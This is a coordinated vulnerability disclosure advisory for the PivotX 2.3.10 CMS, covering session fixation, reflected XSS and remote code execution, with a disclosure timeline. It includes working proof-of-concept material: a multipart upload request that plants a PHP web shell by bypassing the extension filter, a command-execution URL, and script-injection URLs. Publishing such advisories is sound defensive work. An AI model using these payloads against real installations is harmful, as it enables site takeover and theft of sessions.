PivotX 2.3.10: Session Fixation, Reflected XSS, Code Execution

  • Vulnerability: Session Fixation, Reflected XSS, Code Execution
  • Affected Software: PivotX
  • Affected Version: 2.3.10 (probably also prior versions)
  • Patched Version: 2.3.11
  • Risk: Medium-High
  • Vendor Contacted: 2015-05-27
  • Vendor Fix: 2015-06-21
  • Public Disclosure: 2015-06-27

Session Fixation

Risk

Medium; If victim clicks link and logs in, then an attacker can log in as the victim

POC

  1. Send victim to: http://localhost/pivotx_latest/pivotx/fileupload.php?sess=123
  2. Victim logs in
  3. Attacker sets PHPSESSID=123 and is now logged in as well

Code

    // fileupload.php:26

    if (($_COOKIE['PHPSESSID'] == '') && ($_GET['sess'] != '')) {
        session_id($_GET['sess']);
    }

File Upload: Code Execution

Risk

Medium; attacker can upload PHP files and thus gain code execution

Description

It is possible to bypass the check for disallowed file extensions with a filename like foo.php.php:

        POST http://localhost/pivotx_latest/pivotx/fileupload.php?path=/var/www/pivotx_latest/pivotx/db
        Data:
        -----------------------------130539851818218479172117696272\r\nContent-Disposition: form-data; name="file"; filename="foo.php.php"\r\nContent-Type: image/png\r\n\r\n<?php \npassthru($_GET['x']);\n\r\n-----------------------------130539851818218479172117696272\r\nContent-Disposition: form-data; name="submit"\r\n\r\nUpload Image\r\n-----------------------------130539851818218479172117696272--\r\n
The attacker has now code execution under the following address:
        http://localhost/pivotx_latest/pivotx/db/foo.php_.php?x=ls

Code

    // fileupload.php:85

        $disallowedextensions = array_map('trim', explode(',', getDefault($PIVOTX['config']->get('upload_disallowed_extensions'), '.php,.php\d')));
        foreach ($disallowedextensions as $ext) {
            $pattern = "/($ext)(\.|$)/i";
            if (preg_match($pattern, $fileName)) {
                $msg = sprintf(__("File (%s) with illegal file extension (%s) uploaded - filename altered."), $fileName, $ext);
                debug($msg);
                $fileName = preg_replace($pattern, '$1_$2', $fileName);
                break;
            }
        }

Reflected XSS

Risk

Medium; arbitrary JavaScript execution, which can lead to stolen cookies, injected JavaScript keyloggers, and bypassed CSRF protection (which in this case can be used to gain code execution)

Description

PHP_SELF is user supplied, and thus should not be considered secure. It seems that most or all forms are affected by this.

POC

        http://localhost/pivotx_latest/pivotx/index.php/"><script>alert('xsstest')</script></script>?page=page&uid=3
        http://localhost/pivotx_latest/pivotx/index.php/"><script>alert('xsstest')</script></script>?page=templates
        http://localhost/pivotx_latest/pivotx/index.php/"><script>alert('xsstest')</script></script>?page=fileexplore
        [... etc; most pages are affected ...]

Timeline

  • 2015-05-27: Initial Report
  • 2015-05-27: Vendor Confirmation
  • 2015-06-05: Asking for Progress Update (no reply)
  • 2015-06-14: Setting Disclose Date
  • 2015-06-15: Vendor Confirmation
  • 2015-06-17: Vendor Send Fix, Asking for Confirmation
  • 2015-06-17: Confirmed Fix
  • 2015-06-21: Vendor Releases Fix
  • 2015-06-27: Disclosure

4 thoughts on “PivotX 2.3.10: Session Fixation, Reflected XSS, Code Execution

  1. Pingback: SB15-194: Vulnerability Summary for the Week of July 6, 2015 « CyberSafe NV

  2. Pingback: SB15-194: Vulnerability Summary for the Week of July 6, 2015 - MoonKnight Networks

  3. Pingback: SB15-194: Vulnerability Summary for the Week of July 6, 2015 | 007 Software

  4. Pingback: SB15-194: Vulnerability Summary for the Week of July 6, 2015 - Varanoid.com

Leave a Reply

Your email address will not be published.